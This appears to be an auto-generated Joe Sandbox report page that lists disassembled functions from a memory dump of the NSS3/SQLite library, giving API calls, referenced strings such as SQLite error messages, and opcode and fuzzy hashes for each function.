Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID: 3333$UUUU
API String ID: 4101233201-2679824526
Opcode ID: c145da374e261c7af5de5fcbc6aa626e6a1a88dd46e0d4e8e46551072b6e86bf
Instruction ID: 8dcdcfddd8fec99498955ebb170946f904da80c8fad261165bb1b7c7740e744e
Opcode Fuzzy Hash: c145da374e261c7af5de5fcbc6aa626e6a1a88dd46e0d4e8e46551072b6e86bf
Instruction Fuzzy Hash: 89A19072E001159BDB08CF69CD81BEEB7B5BF49328F098129D915A7781E736EC01CBA5

Function 6C50EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

%s %T already exists, xrefs: 6C50FAC8
table, xrefs: 6C50F05C, 6C50FABC, 6C50FAC7
sqlite_temp_master, xrefs: 6C50F0A6, 6C50F2D5
temporary table name must be unqualified, xrefs: 6C50F734
authorizer malfunction, xrefs: 6C50F95C, 6C50F9BF, 6C50FA5E, 6C50FA8B
there is already an index named %s, xrefs: 6C50F9D7
view, xrefs: 6C50F061, 6C50F071, 6C50FAB7
sqlite_master, xrefs: 6C50F0AB, 6C50F2DA, 6C50F757, 6C50F93E
not authorized, xrefs: 6C50F957, 6C50F9BA

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 7bd7ba368f170eb74df372a1bc9e3a6f4f03943d8a4fd03de731c0651f5804a4
Instruction ID: cd0562ce112dd1fd41758ad1707c2a01acef16876a346604311d1dd5c95c54bf
Opcode Fuzzy Hash: 7bd7ba368f170eb74df372a1bc9e3a6f4f03943d8a4fd03de731c0651f5804a4
Instruction Fuzzy Hash: 49727D70E042058FDB14CF68C884BAABBF1BF89308F1582ADD8159BB52D775E846CB94

Function 6C629C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6C4FC52B), ref: 6C629D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C62A035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C62A114

Strings

database corruption, xrefs: 6C62A029, 6C62A108
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C62A01F, 6C62A0E4, 6C62A0FE
%s at line %d of [%.10s], xrefs: 6C62A02E, 6C62A10D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: 62fbf9b59d491745918b464eb0d76dac8aa4c437a82bc77dfd04824e6fb8b748
Instruction ID: 17b0638c19175022d194bac496e9bf312837a2dae9f115dafa145bf37c9b9267
Opcode Fuzzy Hash: 62fbf9b59d491745918b464eb0d76dac8aa4c437a82bc77dfd04824e6fb8b748
Instruction Fuzzy Hash: C622CF7160D7418FC704CF29C49066AB7E1BFCA348F148A2DE8DA97A42D779D846CF4A

Function 6C563D00 Relevance: 9.4, APIs: 2, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000001), ref: 6C564047
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5640DE

Strings

%04d, xrefs: 6C56407B
%02d, xrefs: 6C564086
%lld, xrefs: 6C563FB2
%03d, xrefs: 6C5642E8

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memcpy
String ID: %02d$%03d$%04d$%lld
API String ID: 3510742995-3678606288
Opcode ID: 3c5d7f1750001bb849f2ddc681a96fd9dad3b0b0e0a66c5c2637dd4b0d3ab993
Instruction ID: a7d455e219d6713c8cf351d3f257fa6e2afcf12ce49be9fccf738be74521b865
Opcode Fuzzy Hash: 3c5d7f1750001bb849f2ddc681a96fd9dad3b0b0e0a66c5c2637dd4b0d3ab993
Instruction Fuzzy Hash: D0F12171A087409FD715CF39CC90A6BB7F6AFC6308F148A2DE48597A61EB34D885CB42

Function 6C63AC62 Relevance: 9.1, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6C63AC6E
memset.VCRUNTIME140(?,00000000,00000003,00000017,?), ref: 6C63AC93
memset.VCRUNTIME140(?,00000000,00000050,?,00000017,?), ref: 6C63AD1D
IsDebuggerPresent.KERNEL32(?,?,?,?,00000017,?), ref: 6C63AD39
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017,?), ref: 6C63AD59
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017,?), ref: 6C63AD63

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$DebuggerFeatureProcessor
String ID:
API String ID: 1045392073-0
Opcode ID: c65cd2e99077b5968d4999e0293b0692f7b3c69a3ef25725db2b2c67554f84fd
Instruction ID: cfe7ddc26ad5fd79f21ad686bbc01d8d905617ed7a7ec4cad6f9ab7a9cfd8201
Opcode Fuzzy Hash: c65cd2e99077b5968d4999e0293b0692f7b3c69a3ef25725db2b2c67554f84fd
Instruction Fuzzy Hash: F93169B5D4521C9BDF10DFA5C9897CCBBB8AF08304F1040AAE40DAB240EB719B888F49

Function 6C649D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C508637,?,?), ref: 6C649E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C508637), ref: 6C649ED6

Strings

database corruption, xrefs: 6C649ECA
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C649EC0
%s at line %d of [%.10s], xrefs: 6C649ECF

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 95f2ec8223e87a221a8a9910938d89e19ed8d2d27f68c1f698e6ad846f642db5
Instruction ID: e1719d3a1cabd6b5f694f034854fb4ee8313ddfb455e3630bbea8e864a2a1b30
Opcode Fuzzy Hash: 95f2ec8223e87a221a8a9910938d89e19ed8d2d27f68c1f698e6ad846f642db5
Instruction Fuzzy Hash: D781A231B412158FDB04CF6AC980EDEB3FAAF89308B14C529E919AB741D731ED46CB58

Function 6C657F20 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 713COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,?), ref: 6C6581BC

Strings

BINARY, xrefs: 6C658126
out of memory, xrefs: 6C65835B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memset
String ID: BINARY$out of memory
API String ID: 2221118986-3971123528
Opcode ID: abcb822666cfe7e481ca2b27f0bc3835006b253d8a2c02c52c03eb50b54b8c44
Instruction ID: eccb31cd17d9f9612d765187179ede5a8b980e373cea693d91cf2828620a8f9b
Opcode Fuzzy Hash: abcb822666cfe7e481ca2b27f0bc3835006b253d8a2c02c52c03eb50b54b8c44
Instruction Fuzzy Hash: 0E52C071E15218CFDB14CF99C880BADBBB2FF49308F64815AD855ABB61D730A856CF84

Function 6C5D9EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C5D9ED6

Part of subcall function 6C5D14C0: TlsGetValue.KERNEL32 ref: 6C5D14E0
Part of subcall function 6C5D14C0: EnterCriticalSection.KERNEL32 ref: 6C5D14F5
Part of subcall function 6C5D14C0: PR_Unlock.NSS3 ref: 6C5D150D

PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C5D9EE4

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5D9F38

Part of subcall function 6C5DD030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C5D9F0B), ref: 6C5DD03B
Part of subcall function 6C5DD030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C5DD04E
Part of subcall function 6C5DD030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C5DD07B
Part of subcall function 6C5DD030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C5DD08E
Part of subcall function 6C5DD030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5DD09D

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5D9F49
SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C5D9F59

Part of subcall function 6C5D9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C5D9C5B), ref: 6C5D9D82
Part of subcall function 6C5D9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C5D9C5B), ref: 6C5D9DA9
Part of subcall function 6C5D9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C5D9C5B), ref: 6C5D9DCE
Part of subcall function 6C5D9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C5D9C5B), ref: 6C5D9E43

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
String ID:
API String ID: 4287675220-0
Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction ID: fab0252a436567dc0758a2ccc48ec95927db4c3920781cb88d048b358244f296
Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction Fuzzy Hash: 2C110BB5F043029BF7019A6D9C1079B73A5AFD535CF160234E80A8BB51FF61F914869A

Function 6C68CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C68D086
PR_Malloc.NSS3(00000001), ref: 6C68D0B9
PR_Free.NSS3(?), ref: 6C68D138

Strings

>, xrefs: 6C68CF5B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: f38b8ff4ceed4a435defdb99398b2e91d4eaef33408fe56f9539d22277611d61
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: B4D16B22B476470BFB24587C8CB13EA77938B47378F580326D5629BBE5E6198843C339

Function 6C50AC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C50AE9F
phl, xrefs: 6C50ADA7
0hl, xrefs: 6C50ACC0, 6C50AD22, 6C50AD5E, 6C50AE45
Phl, xrefs: 6C50ADDB, 6C50ADF5, 6C50AE6A
winUnlock, xrefs: 6C50AE18

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID: 0hl$Phl$phl$winUnlock$winUnlockReadLock
API String ID: 0-1567062270
Opcode ID: 5f9a92f4294be0da9df1e7f4535c94c3c004a5fd4112847565c3c23ad1149dd3
Instruction ID: 47ed43b42e99242d2db70be4b5c7649f58dc5b8cd62a58aeb14cf64eba435dfc
Opcode Fuzzy Hash: 5f9a92f4294be0da9df1e7f4535c94c3c004a5fd4112847565c3c23ad1149dd3
Instruction Fuzzy Hash: B1718D716082409FDB14CF2AD885AAABBF5FF8A314F14CA19F94997301D730AA85CBD5

Function 6C62AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9065b145e301b7546cff081938585c08d09522daa02dacdfb9287bb6f1cf62ae
Instruction ID: 5ae9669c76cd0d703b46f79336c633a7280d15f19d1c67132a101548257306ea
Opcode Fuzzy Hash: 9065b145e301b7546cff081938585c08d09522daa02dacdfb9287bb6f1cf62ae
Instruction Fuzzy Hash: E2F1D671F052568BDB04CF1AC8857A977F0EB8A304F154129C906D7751EBB8AA91CFCD

Function 6C61DFC0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C4F5001,?,00000003,00000000), ref: 6C61DFD7
memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6C4F5001,?), ref: 6C61E2B7
memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6C4F5001,?), ref: 6C61E2DA

Strings

W, xrefs: 6C61E111

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memcpymemsetstrlen
String ID: W
API String ID: 160209724-655174618
Opcode ID: 929b4acc7743442cb9fd19f28a02f2581bb3b56ce70b6a013138af6ef4ccca3f
Instruction ID: 9e6440061899098e1d0181a800d9b804c445368d7184b4656bad906518c3a962
Opcode Fuzzy Hash: 929b4acc7743442cb9fd19f28a02f2581bb3b56ce70b6a013138af6ef4ccca3f
Instruction Fuzzy Hash: 06C12731B0D2558FDB04CE2D84946EA77B2BF8A31AF284169DD699BF41D731E801CBD8

Function 6C5E0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C5E1052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C5E1086

Strings

h(^l, xrefs: 6C5E0E55, 6C5E0EC4, 6C5E0F3A, 6C5E0FA7
h(^l, xrefs: 6C5E1062, 6C5E105D, 6C5E0F37, 6C5E1081, 6C5E1082

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: memcpymemset
String ID: h(^l$h(^l
API String ID: 1297977491-3142324195
Opcode ID: e4decbdfd4ae63187fce41c4e740881d931eac177418208f7942cca9ebc100eb
Instruction ID: cd4bba8981df25cf3dfb49a4b1215f8b2f3cf55c122e23b4411bbcb58913eb9f
Opcode Fuzzy Hash: e4decbdfd4ae63187fce41c4e740881d931eac177418208f7942cca9ebc100eb
Instruction Fuzzy Hash: 7FA13E71B0125A9FDF08CF99C890AEEB7B6BF8C314B148129E915A7701DB35EC11DBA0

Function 6C504DB0 Relevance: 5.3, Strings: 4, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6C505125
phl, xrefs: 6C504E1C, 6C504E81, 6C504FDE, 6C505047, 6C5050BB, 6C5051A3, 6C50526C
0hl, xrefs: 6C504EDE, 6C504F82
Phl, xrefs: 6C505019, 6C5050FA, 6C505157, 6C5051DE, 6C5051F2, 6C50520D, 6C505220, 6C5052A2, 6C5052B5

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID: 0hl$Phl$phl$winUnlockReadLock
API String ID: 0-3056926213
Opcode ID: c29b96f4eee63f44c760c718b2c7791d6ec0bbfe620702ec49ba544fe43e68db
Instruction ID: 73fed085d7d7838761825b6c190f79cc83ebe88e2b112f43ffcef3025ef51311
Opcode Fuzzy Hash: c29b96f4eee63f44c760c718b2c7791d6ec0bbfe620702ec49ba544fe43e68db
Instruction Fuzzy Hash: 4DE13C70A183408FDB04DF2AD88565ABBF0FF8A314F518A1DF89997351E770E985CB86

Function 6C506F10 Relevance: 5.2, Strings: 4, Instructions: 218COMMON

Download Yara Rule

Strings

unordered*, xrefs: 6C50702B
noskipscan*, xrefs: 6C507067
sz=[0-9]*, xrefs: 6C507049
*?[, xrefs: 6C507034, 6C507052, 6C507070

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: 1e4f95ab365a14b1137d9dae2c6b051497154607b00ed10cdcb0dd89ac3de39e
Instruction ID: 195f855eed5783628a88cd0f8ba91d4227fe53d8667ad68c6c9045b2c51d4a1f
